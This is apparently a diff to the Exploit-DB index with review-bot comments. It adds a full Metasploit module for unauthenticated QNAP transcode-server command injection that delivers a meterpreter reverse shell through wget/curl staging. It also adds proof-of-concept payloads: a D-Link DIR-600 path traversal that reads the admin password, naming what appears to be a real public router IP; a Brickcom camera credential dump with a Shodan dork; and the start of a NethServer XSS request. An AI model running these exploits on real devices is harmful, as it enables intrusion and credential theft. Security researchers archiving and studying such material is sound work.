19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
|
||||
19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
|
||||
19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0
|
||||
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
|
||||
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
|
||||
|
@ -13619,7 +13620,7 @@ id,file,description,date,author,platform,type,port
|
|||
24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0
|
||||
24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0
|
||||
24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0
|
||||
24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - diagnostic.php Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0
|
||||
24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0
|
||||
24958,platforms/windows/remote/24958.py,"MinaliC WebServer 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0
|
||||
24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0
|
||||
24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000
|
||||
|
@ -13751,7 +13752,7 @@ id,file,description,date,author,platform,type,port
|
|||
25598,platforms/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0
|
||||
25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0
|
||||
25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0
|
||||
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
|
||||
25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0
|
||||
|
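Review bot: Row 25609 is normalized to "D-Link DIR-615H", while row 24477 in this same commit is normalized to "D-Link DIR-615 Rev H". If both refer to the same hardware revision, pick one form for both rows (the commit otherwise standardizes on "Rev X", as in rows 24453 and 24477), so that a single search string matches every entry for that device.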
@ -15208,7 +15209,7 @@ id,file,description,date,author,platform,type,port
|
|||
36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,windows,remote,0
|
||||
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
|
||||
36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery",2012-02-13,MustLive,hardware,remote,0
|
||||
36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - (mod_copy) Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
|
||||
36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
|
||||
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow (Metasploit)",2015-04-21,Metasploit,windows,remote,0
|
||||
36809,platforms/php/remote/36809.rb,"WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80
|
||||
36810,platforms/php/remote/36810.rb,"WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80
|
||||
|
@ -15252,7 +15253,7 @@ id,file,description,date,author,platform,type,port
|
|||
37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0
|
||||
37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",hardware,remote,0
|
||||
37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0
|
||||
37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
|
||||
37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
|
||||
37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0
|
||||
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)",2015-06-24,Metasploit,multiple,remote,0
|
||||
37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0
|
||||
|
@ -15694,6 +15695,7 @@ id,file,description,date,author,platform,type,port
|
|||
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
|
||||
42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
|
||||
42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
|
||||
42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
|
||||
42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
|
||||
41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
|
||||
42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
|
||||
|
@ -27589,7 +27591,7 @@ id,file,description,date,author,platform,type,port
|
|||
24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0
|
||||
24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0
|
||||
24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection",2013-02-05,kallimero,php,webapps,0
|
||||
24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0
|
||||
24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0
|
||||
24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0
|
||||
24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0
|
||||
24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0
|
||||
|
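Review bot: title casing is still inconsistent in this hunk after the change. The 24453 row is recased from `rev B` to `Rev B`, but two rows further down `glossword 1.8.12` (24456) still starts lowercase right above `Glossword 1.8.3` (24457). If this commit is a title-normalization pass, fix 24456 in the same change.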
@ -27602,7 +27604,7 @@ id,file,description,date,author,platform,type,port
|
|||
24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0
|
||||
24475,platforms/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24476,platforms/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 Rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0
|
||||
24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
|
||||
|
@ -27847,7 +27849,7 @@ id,file,description,date,author,platform,type,port
|
|||
25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 - Jammail.pl Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0
|
||||
25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0
|
||||
24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0
|
||||
24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0
|
||||
24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0
|
||||
25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0
|
||||
24986,platforms/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0
|
||||
24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0
|
||||
|
@ -32579,7 +32581,7 @@ id,file,description,date,author,platform,type,port
|
|||
31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate 'wgate.dll' ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0
|
||||
31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0
|
||||
31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081
|
||||
31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 Hardware vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80
|
||||
31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80
|
||||
31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378
|
||||
31768,platforms/php/webapps/31768.txt,"WordPress Plugin BP Group Documents 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80
|
||||
31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0
|
||||
|
@ -32977,7 +32979,7 @@ id,file,description,date,author,platform,type,port
|
|||
32374,platforms/ios/webapps/32374.txt,"Wireless Drive 1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,ios,webapps,0
|
||||
32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0
|
||||
32383,platforms/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0
|
||||
32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0
|
||||
32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0
|
||||
32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections",2008-09-25,"David Sopas",php,webapps,0
|
||||
32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0
|
||||
32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
|
||||
|
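Review bot: the new 32385 title "D-Link DIR-600L AX 1.00" no longer says what `1.00` refers to, because both "Hardware Version" and "Firmware" were dropped. The 31764 rename in the previous hunk kept "Firmware 5.10", so "D-Link DIR-600L AX Firmware 1.00" would be consistent with it and unambiguous.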
@ -38363,3 +38365,11 @@ id,file,description,date,author,platform,type,port
|
|||
42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
|
||||
42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0
|
||||
42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
|
||||
42579,platforms/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,json,webapps,0
|
||||
42580,platforms/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,json,webapps,0
|
||||
42581,platforms/hardware/webapps/42581.txt,"D-Link DIR-600 - Authentication Bypass",2017-08-29,"Jithin D Kurup",hardware,webapps,0
|
||||
42582,platforms/php/webapps/42582.txt,"Car or Cab Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
|
||||
42583,platforms/php/webapps/42583.txt,"PHP Appointment Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
|
||||
42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0
|
||||
42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
|
||||
42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0
|
||||
|
|
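Review bot: several of the new rows disagree with the files they index. 42582 and 42583 are titled "Authentication Bypass" while both advisories describe SQL injection in the login form, 42588 credits only "Emiliano Ipar" where the advisory lists three authors, and 42581 has port 0 although its PoC uses port 8080. The `json` platform on the two NethServer rows (42579, 42580) also looks like it was derived from the `.json` endpoint names rather than from the target, so confirm it before merging.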
|
117
platforms/hardware/remote/42587.rb
Executable file
|
@ -0,0 +1,117 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'QNAP Transcode Server Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an unauthenticated remote command injection
|
||||
vulnerability in QNAP NAS devices. The transcoding server listens
|
||||
on port 9251 by default and is vulnerable to command injection
|
||||
using the 'rmfile' command.
|
||||
|
||||
This module was tested successfully on a QNAP TS-431 with
|
||||
firmware version 4.3.3.0262 (20170727).
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Zenofex', # Initial vulnerability discovery and PoC
|
||||
'0x00string', # Initial vulnerability discovery and PoC
|
||||
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://www.exploitee.rs/index.php/QNAP_TS-131' ],
|
||||
[ 'URL', 'http://docs.qnap.com/nas/4.1/Home/en/index.html?transcode_management.htm' ]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 6 2017',
|
||||
'Privileged' => true,
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
|
||||
},
|
||||
'Targets' => [['Automatic', {}]],
|
||||
'CmdStagerFlavor' => %w{wget curl},
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9251),
|
||||
OptInt.new('DELAY', [true, 'How long to wait for the device to download the payload', 30])
|
||||
])
|
||||
deregister_options 'cmdstager::decoder'
|
||||
end
|
||||
|
||||
def check
|
||||
vprint_status 'Connecting to transcode server...'
|
||||
|
||||
connect
|
||||
sock.put "\x01\x00\x00\x00"
|
||||
res = sock.get_once
|
||||
|
||||
if res.blank?
|
||||
vprint_status 'No reply from server'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
vprint_status "Received response: #{res}"
|
||||
|
||||
return CheckCode::Detected if res.to_s =~ /client's request is accepted/
|
||||
|
||||
CheckCode::Safe
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error 'Connection failed'
|
||||
return CheckCode::Unknown
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
# Filtered characters: 0x20 ! $ & 0x39 , ; = [ ] ^ ` { } %
|
||||
# Execute each command seperately
|
||||
cmd.split(';').each do |c|
|
||||
connect
|
||||
vprint_status "Executing command: #{c}"
|
||||
|
||||
# Replace spaces with tabs
|
||||
c.tr! ' ', "\t"
|
||||
|
||||
sock.put "\x01\x00\x00\x00/|#{c}|\x00"
|
||||
res = sock.get_once
|
||||
|
||||
unless res.to_s =~ /client's request is accepted/
|
||||
print_status 'Unexpected reply'
|
||||
break
|
||||
end
|
||||
|
||||
print_status "Sent command successfully (#{c.length} bytes)"
|
||||
|
||||
disconnect
|
||||
|
||||
if c =~ /^(curl|wget)/
|
||||
print_status "Waiting for the device to download the payload (#{datastore['DELAY']} seconds)..."
|
||||
Rex.sleep datastore['DELAY']
|
||||
end
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with Failure::Unreachable, 'Failed to connect to the transcode server'
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def exploit
|
||||
vprint_status 'Connecting to transcode server...'
|
||||
execute_cmdstager linemax: 400
|
||||
end
|
||||
end
|
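Review bot: in `check`, an empty reply returns `CheckCode::Safe`, but a silent or filtered port does not show that the device is unaffected; `CheckCode::Unknown`, which the `rescue` branch already uses, is the accurate result there. In `execute_command`, the comment `# Filtered characters: 0x20 ! $ & 0x39 , ; ...` lists 0x39, which is the digit 9 and looks out of place among shell metacharacters, so confirm the intended byte, and correct the spelling `seperately` on the next comment line.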
53
platforms/hardware/webapps/42581.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
|
||||
# CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
|
||||
# Date: 29-08-2017
|
||||
# Exploit Author: Jithin D Kurup
|
||||
# Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
|
||||
# Vendor : www.dlink.com
|
||||
# Version: Hardware version: B1
|
||||
Firmware version: 2.01
|
||||
# Tested on:All Platforms
|
||||
|
||||
|
||||
1) Description
|
||||
|
||||
After Successfully Connected to D-Link DIR-600
|
||||
Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's
|
||||
Admin Panel Just by adding a simple payload into URL.
|
||||
|
||||
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to
|
||||
read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack,
|
||||
as demonstrated by discovering the admin password.
|
||||
|
||||
Its More Dangerous when your Router has a public IP with remote login
|
||||
enabled.
|
||||
|
||||
|
||||
IN MY CASE,
|
||||
Tested Router IP : http://190.164.170.249
|
||||
|
||||
|
||||
|
||||
Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ
|
||||
|
||||
2) Proof of Concept
|
||||
|
||||
Step 1: Go to
|
||||
Router Login Page : http://190.164.170.249:8080
|
||||
|
||||
Step 2:
|
||||
Add the payload to URL.
|
||||
|
||||
Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd
|
||||
|
||||
|
||||
|
||||
Bingooo You got admin Access on router.
|
||||
Now you can download/upload settiing, Change setting etc.
|
||||
|
||||
|
||||
|
||||
|
||||
---------------Greetz----------------
|
||||
+++++++++++ www.0seccon.com ++++++++++++
|
||||
Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith
|
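Review bot: the advisory hard-codes what appears to be a live public address, `http://190.164.170.249`, under "Tested Router IP" and again in Step 1; replace it with a placeholder such as `<router-ip>` before this is archived. The title calls the issue an authentication bypass while the description says the flaw is a password read through a `REQUIRE_FILE=` absolute path traversal, so pick one classification. The text also gives "FirmWare Version : 2.01" in one place and "v2.x firmware" in another, and names no fixed firmware or mitigation.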
117
platforms/hardware/webapps/42588.txt
Executable file
|
@ -0,0 +1,117 @@
|
|||
1. Advisory Information
|
||||
========================================
|
||||
Title:
|
||||
|
||||
Brickcom IP-Camera Remote Credentials and Settings Disclosure
|
||||
|
||||
|
||||
Vendor Homepage:
|
||||
|
||||
http://www.brickcom.com
|
||||
|
||||
Tested on Camera types:
|
||||
|
||||
WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af
|
||||
|
||||
|
||||
Remotely Exploitable:
|
||||
|
||||
Yes
|
||||
|
||||
Vulnerability:
|
||||
|
||||
Username / Password / Settings Disclosure (Critical)
|
||||
|
||||
Shodan Dork:
|
||||
|
||||
title:"Brickcom"
|
||||
|
||||
|
||||
Date:
|
||||
|
||||
14/12/2016
|
||||
|
||||
Authors:
|
||||
|
||||
Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar)
|
||||
|
||||
Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio-
|
||||
lizaso-9ab73359)
|
||||
Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston-
|
||||
emanuel-rivadero-858b9ba)
|
||||
|
||||
|
||||
2. CREDIT
|
||||
========================================
|
||||
This vulnerability was identified during penetration test and Research by
|
||||
Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero.
|
||||
|
||||
|
||||
3. Description
|
||||
========================================
|
||||
Brickom Cameras allow a low-privilege user to disclose every configuration
|
||||
in the NVRAM, including credentials in clear text, remotely by making a
|
||||
simple requests. This vulnerability, coupled with the fact that there are
|
||||
two default users with known passwords which are rarely modified, allows an
|
||||
attacker to disclose the admin password and latter every config.
|
||||
|
||||
The most Critical API call is users.cgi?action=getUsers, which provides
|
||||
every user credential. Many other API calls to get information for the WIFI
|
||||
password or FTP credentials, even the whole configuration, are affected
|
||||
depending on the camera model.
|
||||
|
||||
On the hardware side, the UART console of some models (example: WCB-040Af,
|
||||
with baudrate 38400) is exposed in the PCB and after soldering the
|
||||
corresponding pins and connecting, the resulting shell has root access. A
|
||||
simple NVSHOW command will list every config available in clear text,
|
||||
including credentials.
|
||||
|
||||
|
||||
4. Proof-of-Concept:
|
||||
========================================
|
||||
Using the following GET request:
|
||||
|
||||
curl http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers -u user:pass -v
|
||||
|
||||
Request:
|
||||
----------
|
||||
> GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1
|
||||
> Authorization: Basic <BASE64 user:pass>
|
||||
> User-Agent: curl/7.35.0
|
||||
> Host: <IP>:<PORT>
|
||||
> Accept: */*
|
||||
>
|
||||
|
||||
|
||||
Response:
|
||||
----------
|
||||
< HTTP/1.1 200 Ok
|
||||
< Server: mini_httpd
|
||||
< Cache-Control: no-cache
|
||||
< Pragma: no-cache
|
||||
< Expires: 0
|
||||
< Content-Type: text/html
|
||||
< Connection: close
|
||||
<
|
||||
size=3
|
||||
User1.index=0
|
||||
User1.username=admin
|
||||
User1.password=admin
|
||||
User1.privilege=1
|
||||
|
||||
User2.index=1
|
||||
User2.username=viewer
|
||||
User2.password=viewer
|
||||
User2.privilege=0
|
||||
|
||||
User3.index=3
|
||||
User3.username=rviewer
|
||||
User3.password=rviewer
|
||||
User3.privilege=2
|
||||
|
||||
5. SOLUTION
|
||||
========================================
|
||||
The vendor has been contacted and the firmware was updated. See disclosure
|
||||
in:
|
||||
|
||||
https://www.brickcom.com/news/productCERT_security_advisorie.php
|
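Review bot: section 5 says the firmware was updated but names no fixed version, so a reader cannot tell whether a given camera is patched; add the fixed release for each tested model. The header date is 14/12/2016 while the files.csv row for 42588 is dated 2017-08-29 and credits a single author where three are listed here, and `Brickom` in section 3 should read `Brickcom`.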
60
platforms/json/webapps/42579.txt
Executable file
|
@ -0,0 +1,60 @@
|
|||
NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability
|
||||
|
||||
|
||||
Vendor: NethServer.org
|
||||
Product web page: https://www.nethserver.org
|
||||
Affected version: 7.3.1611-u1-x86_64
|
||||
|
||||
Summary: NethServer is an operating system for the Linux enthusiast,
|
||||
designed for small offices and medium enterprises. It's simple, secure
|
||||
and flexible.
|
||||
|
||||
Desc: NethServer suffers from an authenticated stored XSS vulnerability.
|
||||
Input passed to the 'BackupConfig[Upload][Description]' POST parameter is
|
||||
not properly sanitised before being returned to the user. This can be exploited
|
||||
to execute arbitrary HTML and script code in a user's browser session in
|
||||
context of an affected site.
|
||||
|
||||
Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64
|
||||
CentOS Linux 7.3.1611 (Core)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2017-5432
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5432.php
|
||||
|
||||
|
||||
16.08.2017
|
||||
|
||||
--
|
||||
|
||||
|
||||
PoC request:
|
||||
|
||||
POST /en-US/BackupConfig/Upload.json HTTP/1.1
|
||||
Host: 172.19.0.195:980
|
||||
Connection: close
|
||||
Content-Length: 15762
|
||||
Accept: */*
|
||||
Origin: https://172.19.0.195:980
|
||||
X-Requested-With: XMLHttpRequest
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80
|
||||
Referer: https://172.19.0.195:980/en-US/BackupConfig
|
||||
Accept-Language: en-US,en;q=0.8,mk;q=0.6
|
||||
Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2
|
||||
|
||||
------WebKitFormBoundary8FfEu2Tn6fUOnT80
|
||||
Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"
|
||||
Content-Type: application/x-xz
|
||||
|
||||
